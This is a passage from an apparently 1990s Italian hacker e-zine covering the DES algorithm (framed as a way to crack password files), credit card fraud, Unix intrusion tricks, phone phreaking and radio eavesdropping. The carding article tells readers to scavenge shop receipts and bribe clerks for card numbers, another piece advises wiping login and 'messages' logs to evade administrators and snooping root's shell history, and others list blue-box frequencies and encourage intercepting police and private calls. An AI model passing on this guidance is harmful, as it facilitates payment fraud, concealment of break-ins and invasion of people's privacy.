programmi quali john the ripper o star cracker. Questo algoritmo e'
infatti utilizzato in moltissimi sistemi Linux, *nix e altri main
frame. Tramite questa spiegazione sarete in grado (se saro' abbastanza
chiaro) di creare un semplice programma c capace di creare stringhe
di 8 caratteri cryptate. Starete dicendo; e che me ne faccio???.
Molto semplice... se dovreste trovare un file passwd criptato in DES
riuscirete a creare criptazioni identiche e confrontando i risultati
scoprirete i veri login.

Ecco la descrizione dettagliata dell'algoritmo:

1 Elaborare la parola.

1.1 Prende una parola di 64-bit dall'utente, questa parola puo'
essere immessa direttamente o provenire da qualche altra fonte, ma cio'
non cambia l'andamento dell'algoritmo. L'ottavo bit di ogni byte della
parola viene considerato un bit di parita'. Per avere una parola di
corretta parita', ogni byte deve contenere un numero dispari di bit
allo stato "1".

1.2 Calcola il key schedule.

1.2.1 Esegue le seguenti permutazioni sulla parola di 64-bit.
Il bit 1 cioe' il piu' significativo diventa il bit 57 del blocco
permutato della parola originale, il bit 2 divente il 49 del blocco
permutato e cosi' via fino a quando il bit 56 diventa il bit 4 della
parola originale. In questo modo i bit di parita' della parola vengono
scartati.


Scelta di permutazione 1 (PC-1)

57 49 41 33 25 17 9
1 58 50 42 34 26 18
10 2 59 51 43 35 27
19 11 3 60 52 44 36
63 55 47 39 31 23 15
7 62 54 46 38 30 22
14 6 61 53 45 37 29
21 13 5 28 20 12 4

1.2.2 Divide la chiave permutata in 2 meta'. I primi 28 bits sono
chiamati C[0] e gli ultimi 28 bits sono chiamati D[0].

1.2.3 Calcola 16 sottoparole. Incomincia con i = 1.

1.2.3.1 Esegue uno o due shift a sinistra sia su C[i-1] che su
D[i-1] per arrivare a C[i] e D[i]. I numeri di shift necessari per
ogni esecuzione sono riportati in questa tabella.

Esecuzione # 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
Shift a sinistra 1 1 2 2 2 2 2 2 1 2 2 2 2 2 2 1

1.2.3.2 Cambia la concatenazione C[i]D[i] come indicato sotto. Questo
crea K[i], che e' un blocco di 48 bits.

Scelta di permutazione 2 (PC-2)

14 17 11 24 1 5
3 28 15 6 21 10
23 19 12 4 26 8
16 7 27 20 13 2
41 52 31 37 47 55
30 40 51 45 33 48
44 49 39 56 34 53
46 42 50 36 29 32

1.2.3.3 Ritorna a 1.2.3.1 fino a quando K[16] e' calcolato.

2 Procedi con il blocco di 64 bits.

2.1 Memorizza un blocco di 64 bits. Se il blocco e' inferiore a 64 bits,
deve essere sistemato correttamente per questa operazione.

2.2 Esegue le seguenti permutazioni sul blocco.

Permutazione iniziale (IP)

58 50 42 34 26 18 10 2
60 52 44 36 28 20 12 4
62 54 46 38 30 22 14 6
64 56 48 40 32 24 16 8
57 49 41 33 25 17 9 1
59 51 43 35 27 19 11 3
61 53 45 37 29 21 13 5
63 55 47 39 31 23 15 7

2.3 Dividi i 2 blocchi in 2 meta'. I primi 32 bits sono chiamati
L[0], mentre gli ultimi 32 bits R[0].

2.4 Applica le 16 sottoparole al blocco. Inizia con i = 1.

2.4.1 Espandi i 32 bits R[i-1] in 48 bits come si vede nella funzione
di selezione bit sottostante.

Espansione (E)

32 1 2 3 4 5
4 5 6 7 8 9
8 9 10 11 12 13
12 13 14 15 16 17
16 17 18 19 20 21
20 21 22 23 24 25
24 25 26 27 28 29
28 29 30 31 32 1

2.4.2 Esegue un or esclusivo E(R[i-1]) with K[i].

2.4.3 Suddivide E(R[i-1]) xor K[i] in 8 blocchi da 6 bits l'uno.
I bits 1-6 sono B[1],i bits 7-12 sono B[2], cosi' fino a quando i bits 43-48
diventano B[8].

2.4.4 Sostituisce tutti i valori trovati nei Sobstitution boxes per
tutti B[j]. Iniziando con j = 1. Tutti i valori nei Sobstitution boxes
devono essere considerati lunghi 4 bits.

2.4.4.1 Prende il primo e il sesto bit di B[j] assieme come un
valore a 2 bits (chiamandolo m) indicando la riga in S[j] da guardare per
la sostituzione.

2.4.4.2 Prende il secondo e il quinto bit di B[j] assieme come un
valore a 4 bits (chiamandolo n) indicando la colonna in S[j] per trovare
la sostituzione.

2.4.4.3 Sostituisce B[j] con S[j][m][n].

Substitution Box 1 (S[1])

14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

S[2]

15 1 8 14 6 11 3 4 9 7 2 13 12 0 5 10
3 13 4 7 15 2 8 14 12 0 1 10 6 9 11 5
0 14 7 11 10 4 13 1 5 8 12 6 9 3 2 15
13 8 10 1 3 15 4 2 11 6 7 12 0 5 14 9

S[3]

10 0 9 14 6 3 15 5 1 13 12 7 11 4 2 8
13 7 0 9 3 4 6 10 2 8 5 14 12 11 15 1
13 6 4 9 8 15 3 0 11 1 2 12 5 10 14 7
1 10 13 0 6 9 8 7 4 15 14 3 11 5 2 12

S[4]

7 13 14 3 0 6 9 10 1 2 8 5 11 12 4 15
13 8 11 5 6 15 0 3 4 7 2 12 1 10 14 9
10 6 9 0 12 11 7 13 15 1 3 14 5 2 8 4
3 15 0 6 10 1 13 8 9 4 5 11 12 7 2 14

S[5]

2 12 4 1 7 10 11 6 8 5 3 15 13 0 14 9
14 11 2 12 4 7 13 1 5 0 15 10 3 9 8 6
4 2 1 11 10 13 7 8 15 9 12 5 6 3 0 14
11 8 12 7 1 14 2 13 6 15 0 9 10 4 5 3

S[6]

12 1 10 15 9 2 6 8 0 13 3 4 14 7 5 11
10 15 4 2 7 12 9 5 6 1 13 14 0 11 3 8
9 14 15 5 2 8 12 3 7 0 4 10 1 13 11 6
4 3 2 12 9 5 15 10 11 14 1 7 6 0 8 13

S[7]

4 11 2 14 15 0 8 13 3 12 9 7 5 10 6 1
13 0 11 7 4 9 1 10 14 3 5 12 2 15 8 6
1 4 11 13 12 3 7 14 10 15 6 8 0 5 9 2
6 11 13 8 1 4 10 7 9 5 0 15 14 2 3 12

S[8]

13 2 8 4 6 15 11 1 10 9 3 14 5 0 12 7
1 15 13 8 10 3 7 4 12 5 6 11 0 14 9 2
7 11 4 1 9 12 14 2 0 6 10 13 15 3 5 8
2 1 14 7 4 10 8 13 15 12 9 0 3 5 6 11

2.4.4.4 Ritorna a 2.4.4.1 fino a quando tutti gli 8 blocchi sono
stati sostituiti.

2.4.5 Cambia la concatenazione di B[1] fino a B[8] come indicato
nella seguente tabella.

Permutation P

16 7 20 21
29 12 28 17
1 15 23 26
5 18 31 10
2 8 24 14
32 27 3 9
19 13 30 6
22 11 4 25

2.4.6 Or esclusivo dei valori risultanti con L[i-1]. Questi, tutti assieme,
il tuo R[i] = L[i-1] xor P(S[1](B[1])...S[8](B[8])), dove B[j] e' un blocco
a 6 bits di E(R[i-1]) xor K[i]. (La funzione di R[i] puo' essere scritta
semplicemente come: R[i] = L[i-1] xor f(R[i-1], K[i]).)

2.4.7 Esegue L[i] = R[i-1].

2.4.8 Ritorna a 2.4.1 fino a quando K[16] e' stato preso in considerazione.

2.5 Esegue la seguente permutazione sul blocco R[16]L[16]. (nota che
questo blocco R precede il blocco L questa volta.)

Permutazione finale (IP^-1)

40 8 48 16 56 24 64 32
39 7 47 15 55 23 63 31
38 6 46 14 54 22 62 30
37 5 45 13 53 21 61 29
36 4 44 12 52 20 60 28
35 3 43 11 51 19 59 27
34 2 42 10 50 18 58 26
33 1 41 9 49 17 57 25


Questa è una descrizione sull'algoritmo DES per cryptare un blocco di
64 bits. Per decryptare si utilizza lo stesso processo semplicemente
utilizza le parole K[i] in ordine inverso. Praticamente, invece di
utilizzare K[1] per la prima interazione utilizza K[16], e poi K[15]
per seocnda e cosi' via fino a K[1].

L'algoritmo puo' essere riassunto schematicamente nel seguente modo:

Key schedule:
C[0]D[0] = PC1(key)
for 1 <= i <= 16
C[i] = LS[i](C[i-1])
D[i] = LS[i](D[i-1])
K[i] = PC2(C[i]D[i])

Encipherment:
L[0]R[0] = IP(plain block)
for 1 <= i <= 16
L[i] = R[i-1]
R[i] = L[i-1] xor f(R[i-1], K[i])
cipher block = FP(R[16]L[16])

Decipherment:
R[16]L[16] = IP(cipher block)
for 1 <= i <= 16
R[i-1] = L[i]
L[i-1] = R[i] xor f(L[i], K[i])
plain block = FP(L[0]R[0])

Esempi e boxes tratti da Matthew Fischer.
|scacco|


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ CARDiNG iN iTALiA ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
TECNiCHE Di áASE

Un cordiale buongiorno a tutti gli amanti dell'underground in Italia.
Questo articolo trattera' una delle attivita' piu' pericolose, ma anche
piu' redditizie, e cioe' il carding (che per i neofiti significa l'uso di
carte di credito acquisite in maniera illegittima), con riferimento
alla situazione italiana attuale.
Al giorno d'oggi, visto che il commercio si sta sempre piu' evolvendo verso
la comunicazione globale, non sempre e' necessario possedere fisicamente una
carta per poter operare transazioni, e mi riferisco agli acquisti via posta,
via telefono o addirittura via internet; e' quindi sufficiente possedere un
numero di carta di credito per poterlo usare a proprio piacimento, stando
ovviamente ben attenti a tutti i rischi del caso, che non sono pochi. Quindi,
se pensate di poter agire con leggerezza, perche' "tanto non mi beccheranno
mai!"
... beh, NON FATELO.
Tralascio volutamente i vari programmi reperibili in rete per la generazione
di carte di credito (d'ora in poi CC), dato che nel 99% dei casi generano
numeri non validi e/o di sole banche americane, che vengono buoni in
pochissimi casi.

Ora, la tecnologia ha reso permesso lo scambio di informazioni per via
telefonica, e cio' che ci interessa e' principalmente uno strumento che
oramai possiedono la stragrande maggioranza dei negozi, e cioe' il
cosiddetto POS o PagoBancomat.
Questo apparecchio permette di pagare con carta Bancomat (ma questo caso non
e' di nostra competenza :) o con CC, addebitando l'importo sul conto bancario
del compratore praticamente in tempo reale. La cosa interessante, nel caso
di acquisti via CC, e' lo scontrino che viene stampato in doppia copia, una
per il negoziante l'altra per l'acquirente.
Tale scontrino non vale come ricevuta fiscale ma solo come riscontro
dell'avvenuta transazione, e, se da una parte il commerciante e' tenuto a
conservare la sua copia e a distruggerla dopo la registrazione dal
commercialista, l'acquirente e' libero di farne cio' che vuole una volta
allontanato dal negozio... a suo rischio e pericolo, direi...
Cominciamo ad esaminare un modello classico di scontrino:

<tipo di CC utilizzata>
<nome del negozio>
<locazione geografica del negozio>
<ID del terminale POS o PagoBancomat>
<data e ora della transazione>
<numero transazione operata dal terminale>
<numero di riferimento giornaliero>
<numero di carta di credito e data di scadenza della carta>
<causale della transazione>
<tipo di transazione - "ACQUISTO CARDA CREDITO">
<importo della transazione>
<firma del cliente>
<stato della transazione - "TRANSAZIONE ESEGUITA">

N.B.: L'ordine delle informazioni puo' variare, ma a noi interessano solo
alcune di esse.

Cominciamo ad esaminare un po' piu' da vicino le informazioni, guardando
come appare uno scontrino classico (ovviamente inventato):

04 - S.I.
Hackers' Shop
Hackers' Town
TERM-ID: 04792461
DATA: 25/12/97 00:01
N. TRANS: 000069
RIFERIMENTO: 00000069
4536884583455673 9909
AUT. 34673 CAUS: 547
ACQUISTO CARTA CREDITO
IMPORTO L.: 69.666
FIRMA CLIENTE:
......................
TRANSAZIONE ESEGUITA

Bene. I dati che ci interessano non sono poi molti, ed in particolare il
tipo di CC utilizzata, il numero di CC + expiry date e la causale. Se e'
possibile, sarebbe anche utile interpretare la firma del cliente, ma e'
facoltativo...
Per prima cosa bisogna segnarsi il tipo di CC, sapendo che ad esempio
S.I. e' CartaSI e VISA, AMEXCO e' AMERICAN EXPRESS e MC e' MASTERCARD.
Quindi e' il turno del numero di CC (la vera cosa utile, quanto sono stupidi
a segnare il numero sullo scontrino), che e' nel formato
################ yymm, dove le prime 4 cifre sono il codice della banca che
ha emesso la carta, le successive 12 il numero vero e proprio (quindi i
primi 16 numeri sono il numero completo), mentre yymm e' la data di
scandenza della carta nel formato anno/mese. Infine la causale, un numero
di tre cifre, indica ancora il tipo di carta (quindi non e' strettamente
necessario, dato che gia' lo possediamo); comunque ad esempio 875 indica
CartaSI/VISA.
Se e' possibile, interpretate la firma del cliente, puo' sempre essere utile
sapere a chi addebitiamo i nostri piccoli acquisti...

Qui entra quindi in gioco una delle attivita' piu' vecchie praticate dagli
hackers di tutto il mondo, e cioe' il trashing (il ricercare informazioni
nella spazzatura dei posti interessanti): scavando fra i cestini dei negozi
o seguendo i clienti e' possibile reperire questi scontrini, che sono la
vera miniera d'oro di chi pratica il carding in italia. E' possibile, anzi
consigliabile, corrompere un amico che lavora come commesso in un negozio
per avere accesso ad un vasto campionario di numeri e scontrini...
Ora che abbiamo un numero (o piu') di CC, il tipo e possibilmente il nome
del proprietario, come utilizzarlo?
Da questo punto in poi si corrono i rischi maggiori, quindi state bene
attenti all'utilizzo che fate delle vostre scoperte...
...ma di questo parleremo la prossima volta!!
sPIRIT


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ TiPS 'N' TRiCKS ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

1 Premessa
2 Macchine SUN
3 File LOG
4 Truchhetti permessi directory /root.


Salve.
Premessa: Io non sono un grande hacker, anzi, credo proprio di non essere
nemmeno un hacker. Ho scritto questo articoletto perche' pensavo che potesse
tornare utile, alle persone che hackano, visto che in giro e sui manuali che si
reperiscono comunemente nella rete, queste cose non si trovano scritte.
Quindi, se pensate che questo testo sia utile, vi ringrazio, altrimenti se
pensate che non sia interessante, vi prego non me ne fate una colpa! :((


Macchine SUN:
Ho constatato di persona che alcuni trucchetti usati di solito come
backdoor, (SUID SHELL, utente con UID e GID a 0) non funzionano su
macchine SUN 5.5.1
Per cui se vi ritrovate li' sopra, o avete un compilatore, oppure sono cazzi
amari.
Quindi se vi ritrovate in questa situazione, non state neppure a perdere tempo
per cercare di usare una delle tecniche descritte sopra. Tanto non fungono.
(poi se fungono me lo dite ;-PPP

File di LOG:
Allora, spesso e volentieri su tutti i manualetti di UNIX Hacking si legge
che i file di log da togliere per non essere beccati sono di solito 3:

utmp
wtmp
lastlog

Secondo me, oltre a questi file ne andrebbe tolto un terzo: il file "messages".
Il file messages non e' altro che un file dove vengono salvati tutti i messaggi
che i programmi che stanno girando in locale mandano al kernel, quindi
programmi come (ftp, telnet, sendmail, pop3, su, etc..) scriveranno nel file
messages tutto quello che basta per essere beccati. Esempio:

HaCk:~# telnet ppp.cazzone.it
"stronzatine varie..."

Linux 2.0.30 (ppp.cazzone.it) ttsy0

Login:

Ecco a questo punto io mi sono connesso con "ppp.cazzone.it".
Nel file messages del server cazzone apparira la scritta seguente, oltre
ovviamente alle altre:

Feb 2 12:12:00 ppp in.telnetd[97]: connect from <mioip>

Quindi questo significa che anche se io entro tolgo i 3 file detti
precedentemente, ma non provvedo anche a nascondermi nel file messages,
succedera' che il mio IP e la data della connessione che ho effettuato saranno
ben visibili all'amministratore, con conseguente inculamento a saltelli senza
vasellina.


Trucchetti dei permessi di /root:

Allora, adesso sveliamo qualche trucchetto che potra' essere utile quando state
facendo hacking. Questo piccolo trucco che permette di vedere il file
.bash_history del root sfruttando una piccola anomalia dei permessi della
directory root. Infatti il contentuo della suddetta directory la maggior parte
delle volte non e' visibile dall'esterno, poiche' i suoi permessi sono settati
di solito come lettura, scrittura ed esecuzione solo da parte del root.
Pero' se voi una volta loggati nel sistema fate un "cd /root" vi ritroverete
all'interno della directory root.
A questo punto fate un "cat < /etc/passwd" e guardate la shell di lavoro del
root. Se la shell e' "/bin/bash" allora siamo a cavallo, altrimenti lasciate
perdere tutto. Infatti, come dovreste sapere, la bash crea un file chiamato
.bash_history che registra tutti i comandi che vengono impartiti alla shell
da parte di qualsiasi utente. Ogni utente avra' questo file nella propria home
dir.
Quindi se vi posizionate nella dir dell'utente root e fate un
"cat .bash_history | more", come per magia vi apparira' il file .bash_history
dove voi potrete vedere tutti i comandi che il root ha digitato.
In alternativa potete anche scaricarvelo dall'ftp facendo "cd root" e
"get .bash_history" e guardarvelo comodamente a casa.
Questo trucchetto e' bellissimo se volete sapere cosa fa il root quando si
collega, per vedere quali programmi installa, quali file copia nella sua
home dir, quali utenti aggiunge, se fa copie di file importanti i altri posti
su disco, insomma puo' davvero essere utile, anche perche' non solo possiamo
vedere e prendere il file .bash_history, ma tutti i file che sono
all'interno della directory /root. Ovviamente devono essere "-------r-"
altrimenti non gli si va in tasca.

Ok, anche oggi ho concluso. Ci vediamo la prossima volta che avro' qualche
trucchettino fresco fresco!!
DrumFire


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍPHREAKiNGÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ PHREAKiNG iN iTALiA ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Autore: PiGPeN
Consumo: 1 Sprite da 1.5 L
4 pacchetti di cracker di marca sconosciuta
Musica: Night Calls - Joe Cocker
Legend - Lynyrd Skynyrd (in particolare When You Got
Good Friends)
Saluti: Drow Emperor, Quadra, foxtwo e tutti i members dell'A&A
oltre che a tutto Soft Project
Dedicato a: LeLe (il mio vicino di banco)

ATTENZIONE: Questo articolo lo scrivo soltanto per scopi informativi non mi
ritengo responsabile di gente che sradica le cabine telefoniche, si mette a
provare numeri a caso, ne' sono responsabile della vostra bolletta quindi non
incazzatevi con me.


Il motivo di questo articolo e' dovuto al fatto che c'e' troppa confusione
sul phreaking in Italia, e spero con questo breve spazio di fare un po' di
chiarezza.
Quello che scrivo si riferisce in gran parte all'AT&T, facendo pero' esplicito
riferimento alla Telecom, giusto per far notare la piccola differenza.

Comincio con il dire che il phreaking in Italia oggi e' molto piu' difficile
di quanto lo sia in America e questo tuttavia non e' un aspetto positivo, per
il fatto che la Telecom non ha mosso un dito o quasi per le frodi telefoniche,
ma e' stata l'At&T ad imporre certe norme perche' era stufa di vedersi frodata
dall'Italia.
A parte questo la cosa piu' ironica e' che in Italia siamo molto indietro, ma
sembra come che la Telecom si basi sulle esperienze delle grandi compagnie e
quindi non c'e' un rapporto tra mancanza di tecnologia e aumento delle frodi.
Ok a parte questo in Italia ci sono troppe intercettazioni anche senza motivi
e scusatemi, ma mi sembra di essere in una dittatura altro che democrazia del
cazzo.

Vi sara' capitato di sentir parlare di box di ogni colore, ma probabilmente
soltanto per le compagnie americane, infatti sono pochi quelli che funzionano
da altre parti.


BLUE BOX

Il blue box in realta' era nato da una scoperta fatta da un tecnico di
trasmissioni radio il cui nome e' John Draper.
Egli aveva notato che attraverso un fischietto trovato in una scatola di
cereali era possibile fare chiamate senza pagare niente.
Ok molti di voi possono pensare che egli si sia fatto una canna e poi,
preso dalle allucinazioni, si sia messo a fischiare sulla cornetta,
in realta' lo pensavo anch'io, ma non e' cosi'.
Infatti egli si era accorto che quel fischietto emulava una frequenza di
2600hz che guarda caso era proprio quella che in gergo telefonico viene
chiamata TRUNK CODE o semplicemente TRUNK.
Ben presto il suo nome fu associato alla scatola di cereali e venne
chiamato CAPITAN CRUNCH.
Ci tenevo a fare questa premessa, perche' considero Draper uno dei migliori
hacker (oltre al primo phreaker) che ci sia mai stato.
Egli e' stato arrestato un paio di volte e, per non essere trattato come
una ragazza dai detenuti, ha confessato di aver svelato molti dei segreti
che lui conosceva a quei criminali, e oggi egli teme che gran parte di questi
siano dietro alle piu' grosse organizzazioni mafiose.
Come se non bastasse Draper, che ha fondato un ditta che si occupa della
creazione di pagine web, riceve continuamente visite da parte dell'fbi
la quale gli sequestra tutto bloccando il suo lavoro per mesi e facendogli
perdere un sacco di clienti, questo solo per controlli ...
Non intendo spiegare il funzionamento del blue box, anche perche' c'e' tanto
materiale in giro, quello che invece voglio dire e' che non e' piu' possibile
utilizzarlo nemmeno qui in Italia.
Tutto questo lo dobbiamo al fatto che la Telecom (sempre grazie all'At&t),
ha introdotto quello che si chiama Electronic Switching System e che
attraverso il CCIS filtra il trunk non permettendo quindi il suo passaggio.
Attenzione pero' cambiare l'intera rete telefonica non e' una cosa che si
fa in un giorno, ecco perche' probabilmente in alcune parti d'Italia il
blue box e' ancora possibile.
Quello che poi non mi convince molto e' che in realta' non so come si
comporta il CCIS ad altri TRUNK e quindi forse il blue boxing verso paesi
del terzo mondo si puo' fare.

Ecco i trunk presi da un file:


----------------------------------
FOR CALLING VIA: FREQUENCIES:
----------------------------------
ALGERIA 2000 Hz
ARGENTINA 3825 Hz
AUSTRALIA 600& 750 Hz
(SEPERATE)
AUSTRIA 2280 Hz
BAHAMAS 2600 Hz
BANGLADESH 3825 Hz
BRAZIL 3825 Hz
BURUNDI 3825 Hz
CAMEROON 3825 Hz
CANADA 2600 Hz
CHILE 3825 Hz
CUBA 2100/3825 Hz
CYPRUS 3825 Hz
CZECHOSLOVAKIA 2280 Hz
DENMARK 3000/3825 Hz
DOMINICAN REP. 2600 Hz
FIJI 3825 Hz
FRANCE 2280/3850 Hz
GHANA 3825 Hz
HUNGARY 2280/3825 Hz
INDIA 2400 Hz
IRAQ 3825 Hz
(ONLY, WHEN YOU FIND A NUMBER AFTER
THE GULF-WAR IN 1991 - HAHA!)
IRELAND 2040/2400 Hz
COMPOUND 2280 Hz
ISRAEL 3850 Hz
ITALY 2040/2400 Hz
COMPOUND & SEPERATE
che si basano sull'utilizzo dell'ESS e di event
JAMAICA 2600 Hz
JORDAN 3825 Hz
KENIA 2040/2400 Hz
KOREA 3825 Hz
LIBERIA 3825 Hz
LUXEMBOURG 3825 Hz
MADAGASCAR 2280 Hz
MOROCCO 2280 Hz
MOZAMBIQUE 2400 Hz
500/ 20 Hz
1625 Hz
3350 Hz
3825 Hz
NIPPON 2600 Hz
NORWAY 2400 Hz
NEW ZEALAND 600/ 750 Hz
2280 Hz
OMAN 3825 Hz
PERU SOME DIFFERENT
FREQUENCIES!
PHILIPINES 3825 Hz
OLD: 2600 Hz
POLAND 2280 Hz
3825 Hz
500/ 20 Hz
2100 Hz
PORTUGAL 3825 Hz
ROMANA 3825 Hz
OR 2280 Hz
SOUTH AFRICA 600/ 750 Hz
SEPERATE 2280 Hz
SPAIN 2500 Hz
SURINAM 3825 Hz
SWEDEN 2400 Hz
SWITZERLAND 3000 Hz
SYRIA 3825 Hz
TANZANIA 3825 Hz
THAILAND 2400 Hz
UGANDA 2040/2400 Hz
UNITED KINGDOM 600/ 750 Hz
SEPERATE 2280 HZ
USA 2600 Hz
USSR 1200/1600 Hz
SEPERATE & COMPOUND 2600 Hz
YUGOSLAVIA 2280 Hz
ZAMBIA 3825 Hz


RED BOX

Bene questo non e' mai stato possibile per il semplice fatto che esso
consiste nell'emulare i toni delle monetine per i telefoni pubblici, ma
le nostre linee sono ancora ad impulsi, questo e' il tipico esempio di
come la Telecom ha evitato una frode non introducendo innovazioni.


BLACK BOX

Questo box permetteva a colui che vi chiama di non pagare la telefonata,
in teoria, prima dell'ESS si poteva utilizzare, ma non ho mai sentito
nessuno che ne ha fatto uso, probabilmente in Italia ci sono poche persone
che si interessano alla bolletta degli amici ;)

Gli altri box sono meno importanti e molte volte si basano sulla fusione
di altri, quindi non sto qui a parlarne.


COSA C'E' DA TEMERE IN ITALIA?

Ok spero che dedichiate qualche minuto a riflettere su quello che vi diro'.
In America per alcune citta' sono state utilizzate alcune utility anti-frode
che si basano sull'utilizzo dell'ESS e di eventuali device come i DMS, per
esempio una telefonata puo' essere tracciata in 55 sec, mentre per una cifra
prima ci impiegava sui 33-35 sec.
A parte questo c'e' un problema piu' grave e cioe' il monitoraggio.
Per esempio l'At&t tiene delle black list di utenti che fanno troppe chiamate
ai numeri verdi e da quello che so, non mi sembrano poi tanto eccessive.
Una volta che si e' iscritti in queste black list e' possibile che venga fatto
il "tapping" della linea: cio' vuol dire che invece di parlare in due, c'e'
anche un altro che ascolta, o meglio c'e' un registratore che giace sulla
linea.
Molti dicono che e' possibile controllare attraverso il voltaggio se e' a
48 V tutto ok, altrimenti se ci sono troppe variazioni siete loggati; questo
e' vero solo in parte, in quanto le nuove tecniche non sono rilevabili in
questo modo.
A parte questo puo' essere fatto un monitoraggio anche sui toni e se qualcuno
emula dei toni diversi da quelli emessi dal normale tastierino del telefono,
o quelli di funzione tipo il kp e l'st (leggi qualche doc sul bluebox per
saperne di piu') viene immediatamente scritto su una lista controllata
periodicamente dalle autorita' competenti.
Inoltre ci sono alcuni algoritmi scritti in CHILL che si comportano piuttosto
duramente nei confronti di chi fa lo scanning dei numeri e i piu' avanzati
si accorgono pure della modalita' random.
Probabilmente questo software non viene fatto girare in Italia, ma comunque
non si sa mai, visto come viene loggato un italiano !!!
Ah comunque non c'e' una normativa che vieta lo scanning quindi non so come
lo interpreterebbe un giudice, a parte che non so nemmeno come si
comporterebbe con un hacker!

Vorrei chiarire inoltre perche' con il blue box non era possibile stabilire
da dove veniva la chiamata, il motivo e' dovuto al fatto che la seconda
chiamata e cioe' quella frodata non poteva essere interpretata dall'AMA
(Automatic Machine Accounting) perche' al programma risultava presente gia'
una connessione su quella linea e cioe' quella probabilmente fatta al numero
verde.
Questo bug, che in realta' non si puo' chiamare cosi', e' di difficile
correzione (io penso perche' questo e' uno dei modi per stabilire
se una linea e' occupata o meno, ma non so se poi se viene usato per questo),
comunque resta il fatto che molta gente che e' stata arrestata per blue
boxing e' stata scoperta attraverso un controllo della lunghezza delle
chiamate fatte ai numeri verdi e con un successivo controllo sulla linea
telefonica della presenza di toni particolari emulati da parte dell'utente
(tipo il 2600 hz).


COME E' POSSIBILE TELEFONARE GRATIS OGGI?

Bene non c'e' un modo puro per farlo, con i telefoni pubblici anni fa bastava
attaccare il nastro adesivo sulla tessera telefonica, ora se volete
prendervela con una cabina telefonica dovete almeno avere accesso ai fili.
A parte questo cominciate a rinunciare ai trunk e concentratevi sull'hacking
di qualche PABX sui toll free, una volta che ne avete il controllo potete
far pagare a loro le chiamate, comunque non e' cosi' facile.
Gran parte del phreaking si basa ora sulle carte di credito telefoniche
oppure sul brutal forcing e non intendo soltanto dei codici, ma anche
delle apparecchiature ;)
pIGpEN


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍPHREAKiNGÍÍÍÍÄÄÄÄÄÄÄÄÄ RADi0ASC0LT0 PER VERi ASC0LT0Ni ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍͼ

Hy fratelli, e' venuto il momento di accendere la radio e sentire cosa accade
nel mondo...hey cosa avete capito, non quella radio, ma il vostro fidato
scanner!! ? No non quello da tavolo del picci, quello radio che avete appena
comprato dal vostro negozio di sfiducia. Si perche' se non l'avete capito i
media ci consentono di sentire solo una minima parte di tutto quello che viene
effettivamente trasmesso via etere.
Non potete immaginare quante siano le cose che tv, radio(normale) e giornali ci
tengono nascoste. Come ogni giorno,ogni notte accadano un mare di cose che per
i piu' non esistono.
Questa e' una terribile restrizione della nostra liberta', e s'impone di far
qualche cosa.
Avete mai desiderao sapere cosa dice per radio il pulotto che ci sta facendo
una multa da guinness? O sapere cosa dice la propria ragazza al telefonino e se
e' vero che telefona all'amica (hehe)?
Ebbene e' giunto il momento di svelare la verita' !!
Esistono sul mercato (nero o meno che sia) delle radioline particolari, grandi
circa come un normale cellulare (i portatili), che ci permettono di fare giusto
qualcosina di piu' del solito, questi sono i mitici Scanners (ehm..non gli
ultracorpi).
Un modello veramente buono e facilmente reperibile in Italia dal mafioso vicino
casa e' l'UNIDEN BEARCAT twin turbo 200.
Questo modello e' un portatile che si mimetizza facilmente come cellulare, ha
ben 200 frequenze memorizzabili ed un costo abbastanza contenuto (~ 500.000 ).
Ovviamente consiglio uno scanner perche' e' l'unico che permetta di
sintonizzarsi su QUALUNQUE frequenza.
A questo punto che cosa vi manca?
Ma le frequenze ovviamente! Premetto che in Italia le frequenze sono
abbastanza incasinate (cosa non lo e'), nel senso che da un comune all'altro
aumentano, diminuiscono, cambiano, un vero e proprio bordello....
Comunque in linea generale sono cosi' suddivise:

066-088 Mhz Steps 5 Khz Mode NFM -* VHF Low Band *-
108-137 Mhz Steps 12.5 Khz Mode AM -* Aircraft Band *-
137-144 Mhz Steps 5 Khz Mode NFM -* Military Land *-
144-148 Mhz Steps 5 Khz Mode NFM -* 2m Amateur Band *-
148-174 Mhz Steps 5 Khz Mode NFM -* VHF High Band *-
406-420 Mhz Steps 12.5 Khz Mode NFM -* Federal Gov. *-
420-450 Mhz Steps 12.5 Khz Mode NFM -* 70cm Amat. Band *-
450-470 Mhz Steps 12.5 Khz Mode NFM -* UHF Stndr. Band *-
